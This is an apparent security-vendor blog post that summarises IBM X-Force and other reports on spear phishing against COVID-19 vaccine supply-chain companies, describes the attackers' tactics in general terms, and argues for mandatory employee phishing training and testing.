Yesterday, IBM Security X-Force warned of more spear phishing attacks against companies involved in the COVID-19 vaccine supply chain. This warning was issued after their team discovered 50 more files tied with attempts to phish employee credentials.
This is the second report released by IBM Security highlighting the COVID-19 cyberattack. Whereas the first report pointed out the presence of a phishing campaign against businesses participating in the vaccine supply chain.
How the latest IBM report on spear phishing can help protect your business
The new report warns that the campaign is far more sophisticated than anticipated. Moreover, the attackers are targeting executives and workers across the board. This includes key positions, such as chief executive officers, global sales officers, directors of finance, system administrators, and human-resource officers as well.
Staff of all businesses should take a clear note of these reports. This is because these reports show how sophisticated phishing attacks have become. More importantly, why you need to incentivize phishing training in your company.
In this blog, we’ll take a closer look at the IBM report and highlight the points that should concern you.
The report issued on April 14, was the second report issued by IBM’s security intelligence. A similar report on COVID-19 themed phishing attacks was issued by the Unit-42 of the Palo Alto Network as well. The Unit 42 report shared their study of 70,000 similar emails.
The two IBM reports focus on spear phishing attempts on the COVID-19 vaccine supply chain. As per the reports, the attackers targeted 44 companies in the chain in 14 countries across the globe. This includes businesses in transportation, healthcare and technology sectors as well.
The campaign impersonated an executive from Haier Biomedical, a major biomedical company, and targeted executive positions and roles across the board.
Key takeaways of the IBM report
Here are the key takeaways of the report that should interest you –
- Firstly, the phishing attempts on the vaccine supply chain began well in advance. That is, months before a vaccine was approved for use.
- Secondly, the attackers studied the targeted organizations beforehand. This became clear from the content of the emails.
- Thirdly, the language of the messages displayed a high level of language skill. It matched with the educational background of the person they spoofed.
- And lastly, the emails used attachments that would open locally, and ask the victim for his or her credentials to view the file.
Why is spear phishing so dangerous?
Businesses should be worried about the level of sophistication of these attacks. They underline how refined spear phishing attacks have become.
Another example of a high-severity phishing campaign was disclosed by Proofpoint recently. Last month, it published the details of a similar attack that targeted senior medical researchers in the US and Israel.
The attackers used multiple modes of communication to trap their targets. They used texts, email phishing, LinkedIn and WhatsApp to build trust and persuade the targets to visit a fake website. The fake website would then be used to harvest their victim’s Microsoft credentials.
In our opinion, you need to exercise strict vigilance to ward off such attacks. This is because phishing filters cannot guard you against all phishing attempts. Criminals can bypass them by hijacking domains and using valid Gmail addresses.
Another problem is the amount of personal data that has been leaked. Last week, business insider reported a Facebook data leak that happened in 2019. The incident compromised phone numbers and personal details of 500 million Facebook users. The ongoing Accellion data breach too has resulted in leakage of sensitive information about millions of people across the globe.
Altogether, you should be prepared for malicious emails that look legitimate. It fact, it would appear that they originated from trustworthy sources.
Why is phishing training so important?
Your strongest protection against such emails is employee awareness. For the purpose, you need to put in place a strong phishing training program.
The training should cover all aspects of phishing. This should include, how to check email addresses, links, and email attachments.
In our opinion, you need to put in place a holistic training program. It should cover all traits of information security. This is because spear phishing attacks discussed above are trickier than phishing emails. Thus, you should cover topics such as good email practices and secure use of mobile devices as well.
The phishing training should be mandatory for all, including contractors and third-party vendors.
In addition to the training, the employees should also go through regular phishing tests. Taking these steps would ensure that your staff remains vigilant towards suspicious emails. Moreover, your IT staff would be able to figure out the weaknesses of your security apparatus.